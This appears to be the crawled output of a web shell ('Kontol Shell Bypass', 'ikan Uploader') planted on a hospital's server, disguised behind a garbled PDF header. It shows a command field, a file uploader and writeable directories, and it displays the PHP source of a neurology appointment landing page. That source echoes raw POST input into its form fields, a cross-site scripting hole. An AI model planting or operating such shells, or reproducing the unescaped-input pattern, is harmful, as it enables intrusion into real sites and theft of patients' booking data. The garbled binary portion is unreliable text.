%PDF- <> %âãÏÓ endobj 2 0 obj <> endobj 3 0 obj <>/ExtGState<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/Annots[ 28 0 R 29 0 R] /MediaBox[ 0 0 595.5 842.25] /Contents 4 0 R/Group<>/Tabs/S>> endobj ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<> endobj 2 0 obj<>endobj 2 0 obj<>es 3 0 R>> endobj 2 0 obj<> ox[ 0.000000 0.000000 609.600000 935.600000]/Fi endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream

nadelinn - rinduu

Command :

ikan Uploader :
Directory :  /var/www/html/shardahospital_old.org/lp/neurology/
Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 
Current File : /var/www/html/shardahospital_old.org/lp/neurology/index.php
<?php
error_reporting(0);
include('../lms/common.php');
include("../lms/include/header.php");
?>

<body data-spy="scroll" data-target="#navbar" data-offset="100">
    <!--Preloader div-->
<!--    <noscript><iframe src="https://www.googletagmanager.com/ns.html?id=GTM-NFLLKCR" height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript>-->

    <div class="preloader"></div>
    <!-- Fixed navbar -->
    <nav class="navbar navbar-default navbar-fixed-top">
        <div class="container">
            <div class="navbar-header mobile-center">
                <a class="navbar-brand" href="index.php"><img src="images/health-logo.png" alt="Sharda Hospital"> </a>

            </div>

            <div class="click-to-call hidden-xs">
                <a href="tel:0120-2333999" target="_blank">
                    <span class="phone-icon"><i class="fa fa-phone"></i></span> <span>0120-2333999</span>
                </a>
            </div>

        </div>
    </nav>
    <!-- // End Fixed navbar -->
    <header id="top" class="header header_menu_padding medical_bg">
        <div class="container">
            <div class="header-content">
                <div class="row">
                    <div class="col-md-6">
                        <div class="hero-area">
                            <h1 class="headline">The Institute <span class="text-highlight">of </span>Neuro Sciences </h1>
                            <!--   <h3 class="headline-support">Landing Page Template</h3>-->
                            <!-- Telephone : only visible on Mobile devices
                                              To Change Mobile on Desktop, Its above -->
                            <div class="click-to-call visible-xs">
                                <a href="tel:0120-2333999" target="_blank">
                                    <span class="phone-icon"><i class="fa fa-phone"></i></span> <span>0120-2333999</span>
                                </a>
                            </div>
                            <p class="vertical-space">The Institute of Neuro Sciences at Sharda Hospital offers micro-neurosurgical and endoscopy/minimally invasive services to treat neurological and spinal ailments.</p>
                        </div>
                        <div class="benefits benefits-vertical">
                            <div class="benefit-item">
                                <div class="benefit-icon"><i class="fa fa-stethoscope"> </i></div>
                                <h6 class="benefit-title">Accomplished Doctors</h6>
                                <p>Experienced doctors who have successfully performed complicated and life-saving surgeries</p>
                            </div>

                            <div class="benefit-item">
                                <div class="benefit-icon"><i class="fa fa-heartbeat"> </i></div>
                                <h6 class="benefit-title">Minimally Invasive Spinal Surgeries</h6>
                                <p>500+ surgeries performed with endoscopic and microscopic approach</p>
                            </div>

                            <div class="benefit-item">
                                <div class="benefit-icon"> <i class="fa fa-file-text-o"> </i></div>
                                <h6 class="benefit-title">State of the art Neuro ICU</h6>
                                <p>Top notch medical care with 24*7 dedicated intensive care team and ultra-modern gadgets</p>
                            </div>
                        </div>
                    </div>
                    <!-- // end .col -->


                    <div class="col-md-6 position-static-md">


                        <div class="appointment-form top-space-sm col-xs-12">

                            <div class="form-header" id="appointment">
                                <h4>MAKE AN APPOINTMENT</h4>
                                <a href="tel:8003456789">Call: 0120-2333999</a>

                                <div class="or_icon">OR</div>
                            </div>

                            <?php
                            if ($error_message) {
                                echo $error_message;
                            }
                            if ($success_message) {
                                echo $success_message;
                            }
                            if ($error_email_exist) {
                                echo $error_email_exist;
                            }
                            ?>

                            <form id="contact_form" method="POST" name="contact_form">

                                <div class="form-group">
                                    <label>Full Name <font color="#990000">*</font></label>
                                    <input type="text" class="form-control" name="full_name"  id="full_name" value="<?php echo $_POST['full_name']; ?>" title="Your full name please">
                                </div>
                                <div class="form-group">
                                    <label>Email ID <font color="#990000">*</font></label>
                                    <input type="email" class="form-control  newsletter-signup input" name="email" id="email" value="<?php echo $_POST['email']; ?>" onBlur="checkMailStatus()" title="We need your email address">
                                    <span id='email_status' style="font-size:12px;"> </span>
                                </div>

                                <div class="form-group">
                                    <label>Phone Number <font color="#990000">*</font></label>
                                    <input type="text" class="form-control" name="phone" id="phone" value="<?php echo $_POST['phone']; ?>" maxlength='10' title="Please enter your phone number">
                                    <span id='errmsg' style="color:#900; font-size:12px;"> </span>
                                </div>

                                <div class="form-group">
                                    <label>Date and Time </label>

                                    <input type="text" class="form-control"  data-field="datetime" name="date_time" id="date_time"  style="height:38px;" >

                                    <div id="dtBox" style="float:right;"></div><?php if ($error_date_time) {
                                echo $error_date_time;
                            } ?>

                                </div>

                                <div class="form-group">
                                    <label>Additional information</label> <small class="text-muted">(optional)</small>
                                    <textarea class="form-control" name="message1" id="message1" required rows="3" placeholder="Enter your message here"><?php if ($_POST['message1']) echo trim($_POST['message1']); ?>  </textarea>
                                </div>

                                <div class="form-group" style="display:none;">
                                    <label>Department <font color="#990000">*</font></label>
                                    <input type="text" class="form-control" name="department" readonly  value="Neurology">                                
                                </div>

                                <div class="text-center top-space">
                                    <input type="submit" class="btn btn-success btn-block btn-xl" name="submits"  id="submits" value="Book an Appointment" />
                                    <small class="text-muted" style="font-size:14px;">Award-winning hospital with advanced methods of treatment.</small>
                                    <div id="js-contact-result" data-success-msg="Form submitted successfully." data-error-msg="Oops. Something went wrong."></div>
                                </div> 

                            </form>
                        </div>                
                    </div>


                 
                </div>
                <!-- // end .row -->
            </div>
            <!-- // end .header-content -->
        </div>
        <!-- end .container -->
    </header>

    <!-- 

     ====================================== -->


    <section class="appointment">
        <div class="container">
            <div class="row">
                <div class="col-sm-6">
                    <div class="section-title left-aligned"> 
                        <img src="images/medical_big.jpg" class="img-responsive" alt="Appintment Image">
                    </div>
                </div>

                <div class="col-sm-6">
                    <div class="section-title left-aligned">                          
                        <h2>Quality Treatment <span class="text-highlight">with</span> Empathy &AMP; Care</h2>
                        <!--                        <h3 class="subline">You'll love the template features</h3>-->
                        <hr>
                    </div>

                    <p>Sharda Hospital imbibes faith  in providing the highest quality of diagnostic and therapeutic patient care through 24*7 available services.</p>

                    <ul class="list-unstyled checklist">   
                        <li><p> <i class="fa fa-check"></i>Daily Neuro OPD Services</p></li>
                        <li><p> <i class="fa fa-check"></i>Hi-end Modular OT</p></li>
                        <li><p> <i class="fa fa-check"></i>Multispeciality Service Care</p></li>                        
                        <li><p> <i class="fa fa-check"></i>Neuro Spine Emergency Services</p></li>                        
                    </ul>
                </div>
                <!-- // end .col -->
            </div>
            <!-- // end .row -->
        </div>
        <!-- end .container -->
    </section>

    <!-- 
     OUR SERVICES
     ====================================== -->
    <section class="highlight top-space-xl">

        <div class="container">

            <div class="section-title text-center"> 
                <h2>Healing <span class="text-highlight">Procedures</span></h2>
                <!--                <h3 class="subline">We are the pioneers in cardiology. Our team ensures complete assistance during the treatment, recovery and post-treatment phase.</h3>-->
                <hr>
            </div>

            <!--start-->
            <div id="mixedSlider">
                <div class="MS-content">
                    <div class="item">
                        <div class="imgTitle">                            
                            <img src="images/complex-Spinal-Surgeries-&-Minimal-Access-Spine-Surgery.jpg" alt="The Four Seasons Hotel">                
                        </div>
                        <h2 class="blogTitle">Complex Spinal Surgery</h2>
                        <p>Advanced procedures like disc prolapse, stabilization for spinal instability and deformity and spine tumor</p>
                    </div>

                    <div class="item">
                        <div class="imgTitle">                            
                            <img src="images/surgery-for-Parkinson-Disease.jpg" alt="The Four Seasons Hotel">                
                        </div>
                        <h2 class="blogTitle">Parkinson's Disease Surgery</h2>
                        <p>Excellence in surgery for progressive disorder of the nervous system affecting voluntary movement</p>
                    </div>

                    <div class="item">
                        <div class="imgTitle">                            
                            <img src="images/epilepsy.jpg" alt="The Gleneagles Hotel">                
                        </div>
                        <h2 class="blogTitle">Epilepsy Treatment</h2>
                        <p>Best treatment for this global health problem which has a high incidence of cases in India</p>
                    </div>

                    <div class="item">
                        <div class="imgTitle">                            
                            <img src="images/sterotactic-Biopsy-Aspiration.jpg" alt="The Four Seasons Hotel">               
                        </div>
                        <h2 class="blogTitle">Stereotactic Biopsy</h2>
                        <p>Approaching deep-seated tutors through a small opening in the skull under proper CT/ MRI guidance</p>
                    </div>

                    <div class="item">
                        <div class="imgTitle">                            
                            <img src="images/interventional-Procedures.jpg" alt="The Four Seasons Hotel">                
                        </div>
                        <h2 class="blogTitle">Neuroendoscopic Surgery</h2>
                        <p>Precise endoscopic approach to intraventricular and pituitary tutors, ventriculostomies and to spinal ailments</p>                        
                    </div>

                    <div class="item">
                        <div class="imgTitle">                            
                            <img src="images/vertebroplasty.jpg" alt="The Four Seasons Hotel">             
                        </div>
                        <h2 class="blogTitle">Vertebroplasty</h2>
                        <p>Best medical care for vertebras strengthening in case of osteoporotic, old and weak bones using minimally invasive approach</p>
                    </div>

                    <div class="item">
                        <div class="imgTitle">                            
                            <img src="images/neuroendocrine-Surgery.jpg" alt="Atholl Palace Hotel">           
                        </div>
                        <h2 class="blogTitle">Interventional Procedure</h2>
                        <p>Excellence in performing complex neurosurgeries like craniotomy, vascular malformation and endovascular coiling of aneurysm</p>
                    </div>

                </div>
                <div class="MS-controls">
                    <button class="MS-left"><i class="fa fa-angle-left" aria-hidden="true"></i></button>
                    <button class="MS-right"><i class="fa fa-angle-right" aria-hidden="true"></i></button>
                </div>
            </div>
            <!--End-->

        </div>
        <!-- // end .container -->

    </section>
    <!-- end section.services -->

    <!-- 
     Watch a Video
     ====================================== -->

<!--    <section class="watch_video">
        <div class="container">
            <div class="section-title text-center">
                <h2>WATCH <span class="text-highlight">THIS</span> VIDEO</h2>
                <h3 class="subline">When they talk about their healing journey, it fills our heart with contentment.</h3>
                <hr>
            </div>
            <div class="row">
                <div class="col-md-8 col-md-offset-2">
                    <div class="embed-responsive embed-responsive-16by9">
                        <iframe src="https://player.vimeo.com/video/95558527?color=ff485e&amp;title=0&amp;byline=0&amp;portrait=0&amp;wmode=opaque" allowfullscreen=""></iframe>
                    </div>
                </div>
            </div>
        </div>
    </section>-->
    <!-- end section.watch_video -->

    <!-- 
     Testimonials
     ====================================== -->
    <section class="highlight testimonials top-space-xl">
        <div class="container">

            <div class="section-title text-center">                
                <h2>OUR <span class="text-highlight">PATIENT </span> TESTIMONIALS</h2>
                <h3 class="subline">Don't take our word. See what our patients said about us.</h3>
                <hr>
            </div>

            <div class="row">
                <div class="col-sm-2">
                    <img src="images/patient-pic2.jpg" class="img-responsive img-circle center-block" alt="patient">
                </div>
                <div class="col-sm-9">
                    <blockquote class="bq-right">I underwent Pallidotomy after being diagnosed with Parkinson's disease, can't thank the doctor enough.</blockquote>
                    <p class="bq-author"><strong><span class="text-highlight">Mr. Karampreet Sahu</span></strong></p>
                </div>
            </div>
            <!-- // end .row -->
            <div class="vertical-space-lg">
                <hr>
            </div>
            <div class="row">
                <div class="col-sm-2 col-sm-push-9">
                    <img src="images/patient-pic.jpg" class="img-responsive img-circle center-block" alt="patient">
                </div>

                <div class="col-sm-9 col-sm-pull-2">
                    <blockquote class="bq-left">It has been 4 months after undergoing temporal lobectomy and I have not had a single seizure.</blockquote>
                    <p class="text-right bq-author"><strong> <span class="text-highlight">Mrs. Kuljinder Kaur</span></strong></p>
                </div>
            </div>
            <!-- // end .row -->
            <div class="vertical-space-lg">

            </div>

        </div>
        <!-- end .container -->
    </section>
    <!-- end section.testimonials -->

    <!-- 
     Call to Action
     ====================================== -->
    <section class="call-to-action">
        <div class="container">
            <div class="section-title text-center">
                <h2><span class="text-highlight">FREE</span> CONSULTATION FIRST TIME</h2>
                <h3 class="subline">Award-winning  hospital with advanced methods of treatment.</h3>
                <hr>

            </div>

            <div class="cta-button text-center vertical-space bottom-space-xl"> <a class="btn btn-success btn-xl" href="#appointment">MAKE AN APPOINTMENT</a>
                <h6 class="vertical-space">or Call : <a href="tel:01202333999">0120-2333999</a></h6>
            </div>

        </div>
    </section>
    <!-- end section.footer-action -->

    <!-- 
     Call to ActionF
     ====================================== -->
<?php include("../lms/include/highlights.php"); ?>
    <!-- end section.footer-action -->

    <!-- 
     Google Map
     ====================================== -->

   <div class="google-map">
        <iframe src="https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3507.169408441502!2d77.48051051461232!3d28.474444382480506!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x390cea9cae68659b%3A0xc95b3bd7cf26316e!2sSharda+Hospital!5e0!3m2!1sen!2sin!4v1498126204776" width="100%" height="434" frameborder="0" style="border:0" allowfullscreen></iframe>
    </div>
    <!-- end Google Map -->

    <footer>
        <div class="container">
            <div class="row">
                <div class="col-sm-5 text-left footNav01">
                    <small>&COPY; 2018. All Sharda Hospital. All Rights Reserved</small>
                </div>
                <div class="col-sm-3">
                    <div class="social-icons footNav02">
                        <a href="https://twitter.com/shardahospital" target="_blank"> <i class="fa fa-twitter"></i> </a>
                        <a href="https://www.facebook.com/ShardaHospital/" target="_blank"> <i class="fa fa-facebook"></i> </a>
                        <a href="https://plus.google.com/+shardahospitalorg" target="_blank"> <i class="fa fa-google-plus"></i> </a>
                    </div>
                </div>
                <div class="col-sm-4 footNav03">
                    <ul class="navbar-nav footer-nav">
                        <li class="nav-item"><a href="disclaimer.php">Disclaimer</a></li>
                        <li class="nav-item"><a href="privacy-policy.php">Privacy Policy</a></li>
                        <li class="nav-item"><a href="terms-of-use.php">Terms of Use</a></li>
                    </ul>
                </div>
            </div>            
        </div>        
    </footer>

    <a class="btn btn-success btn-xl app-button" href="#appointment">Book an Appointment</a>
    <a href="#top" class="back_to_top"><img src="images/back_to_top.png" alt="back to top"></a>

 
<?php include("../lms/include/footer.php"); ?>
</body>

</html>

Kontol Shell Bypass